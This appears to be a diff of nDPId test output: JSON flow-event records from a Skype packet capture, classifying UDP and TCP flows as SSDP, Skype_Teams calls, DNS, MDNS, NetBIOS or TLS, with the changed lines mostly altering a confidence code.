-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
